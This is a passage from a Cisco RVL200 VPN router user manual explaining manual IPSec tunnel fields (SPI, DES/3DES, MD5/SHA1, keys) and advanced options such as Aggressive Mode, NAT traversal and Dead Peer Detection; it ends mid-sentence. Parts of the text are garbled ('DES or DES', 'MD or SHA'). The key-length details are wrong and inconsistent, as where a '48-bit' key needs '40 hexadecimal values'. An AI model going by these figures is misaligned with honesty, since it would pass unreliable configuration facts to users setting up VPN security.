Chapter 4, Advanced configuration – Cisco 4-Port SSL/IPSec VPN Router RVL200 User Manual

Chapter 4

Advanced Configuration

9

4-Port SSL/IPSec VPN Router

Manual

Incoming and Outgoing SPI (Security Parameter

Index)

SPI is carried in the ESP (Encapsulating Security

Payload Protocol) header and enables the receiver and

sender to select the SA, under which a packet should be

processed. Hexadecimal values is acceptable, and the

valid range is 100~ffffffff. Each tunnel must have a unique

Incoming SPI and Outgoing SPI. No two tunnels share the

same SPI. The Incoming SPI here must match the Outgoing

SPI value at the other end of the tunnel, and vice versa.

Encryption

Select a method of encryption, DES or DES.

This determines the length of the key used to encrypt or

decrypt ESP packets. DES is 56-bit encryption and 3DES

is 168-bit encryption. 3DES is recommended because it is

more secure. Make sure both ends of the VPN tunnel use

the same encryption method.

Authentication

Select a method of authentication, MD

or SHA. The Authentication method determines how

the ESP packets are validated. MD5 is a one-way hashing

algorithm that produces a 128-bit digest. SHA is a one-way

hashing algorithm that produces a 160-bit digest. SHA1

is recommended because it is more secure. Make sure

both ends of the VPN tunnel use the same authentication

method.

Encryption Key

This field specifies a key used to encrypt

and decrypt IP traffic. Enter a key of hexadecimal values.

If DES is selected, the Encryption Key is 16-bit, which

requires 16 hexadecimal values. If you do not enter enough

hexadecimal values, then the rest of the Encryption

Key will be automatically completed with zeroes, so the

Encryption Key will be 16-bit. If 3DES is selected, the

Encryption Key is 48-bit, which requires 40 hexadecimal

values. If you do not enter enough hexadecimal values,

then the rest of the Encryption Key will be automatically

completed with zeroes, so the Encryption Key will be 48-

bit. Make sure both ends of the VPN tunnel use the same

Encryption Key.

Authentication Key

This field specifies a key used to

authenticate IP traffic. Enter a key of hexadecimal values.

If MD5 is selected, the Authentication Key is 32-bit, which

requires 32 hexadecimal values. If you do not enter enough

hexadecimal values, then the rest of the Authentication Key

will be automatically completed with zeroes until it has 32

hexadecimal values. If SHA is selected, the Authentication

Key is 40-bit, which requires 40 hexadecimal values. If you

do not enter enough hexadecimal values, then the rest of

the Authentication Key will be automatically completed

with zeroes until it has 40 hexadecimal values. Make sure

both ends of the VPN tunnel use the same Authentication

Key.

Advanced

For most users, the settings on the VPN page should suffice;

however, the Router provides advanced IPSec settings for

advanced users using the IKE with Preshared Key mode.

Click Advanced to view the Advanced settings.

Advanced

Aggressive Mode

There are two types of Phase 1

exchanges, Main Mode and Aggressive Mode.
Aggressive Mode requires half of the main mode messages

to be exchanged in Phase 1 of the SA exchange. If network

security is preferred, leave the Aggressive Mode check box

unchecked (Main Mode will be used). If network speed is

preferred, select Aggressive Mode. If you select one of

the Dynamic IP types for the Remote Security Gateway

Type setting, then Main Mode will be unavailable, so

Aggressive Mode will be used.

Compress (Support IP Payload Compression Protocol

(IP Comp))

IP Payload Compression is a protocol that

reduces the size of IP datagrams. Select this option if you

want the Router to propose compression when it initiates a

connection. If the responders reject this proposal, then the

Router will not implement compression. When the Router

works as a responder, it will always accept compression,

even if compression is not enabled.

Keep-Alive

Keep-Alive helps maintain IPSec VPN tunnel

connections. If a connection is dropped and detected, it

will be re-established immediately. Select this option to

use this feature.

NetBIOS Broadcast

Select this option to allow NetBIOS

traffic to pass through the VPN tunnel. By default, the

Router blocks this traffic.

NAT Traversal

This is enabled by default. Both the IPSec

initiator and responder must support the mechanism for

detecting the NAT router in the path and changing to a

new port, as defined in RFC 3947.

Dead Peer Detection (DPD)

When DPD is enabled, the

Router will send periodic HELLO/ACK messages to check

the status of the VPN tunnel (this feature can be used only

when both peers or VPN devices of the VPN tunnel use the

DPD mechanism). Once a dead peer has been detected,